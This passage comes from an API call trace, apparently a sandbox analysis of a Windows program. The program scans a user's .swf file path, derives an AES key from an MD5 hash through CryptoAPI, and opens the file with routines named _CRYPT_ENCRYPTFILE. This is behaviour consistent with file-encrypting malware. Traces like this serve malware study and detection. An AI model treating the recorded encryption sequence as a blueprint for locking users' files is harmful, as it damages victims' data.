dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IoPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oPtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tJD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JD0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gbyjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="byjv6.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.474] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.475] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.475] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.475] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.475] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.475] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.475] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.475] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0x90af58 [0199.477] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.477] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.477] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.477] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.477] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.477] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.478] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.479] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.479] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.479] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.479] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.479] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.479] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0199.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.480] CryptDestroyHash (hHash=0x90ae18) returned 1 [0199.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\ioptjd0u8gbyjv6.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.483] GetFileAttributesW 